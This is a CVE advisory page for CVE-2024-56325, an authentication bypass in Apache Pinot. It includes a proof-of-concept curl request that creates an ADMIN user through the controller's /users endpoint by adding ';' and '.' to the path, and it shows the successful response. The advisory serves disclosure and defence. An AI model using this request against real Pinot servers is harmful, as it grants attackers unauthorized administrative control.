CVE-2024-56325
Apache Pinot: Authentication bypass issue. If the path does not contain / and contain . authentication is not required
We use these services and cookies to improve your user experience. You may opt out if you wish, however, this may limit some features on this site.
Please see our statement on Data Privacy.
Apache Pinot: Authentication bypass issue. If the path does not contain / and contain . authentication is not required
Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot.
Reserved 2024-12-19 | Published 2025-04-01 | Updated 2025-04-18 | Assigner apacheCWE-288 Authentication Bypass Using an Alternate Path or Channel
lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v
Support options
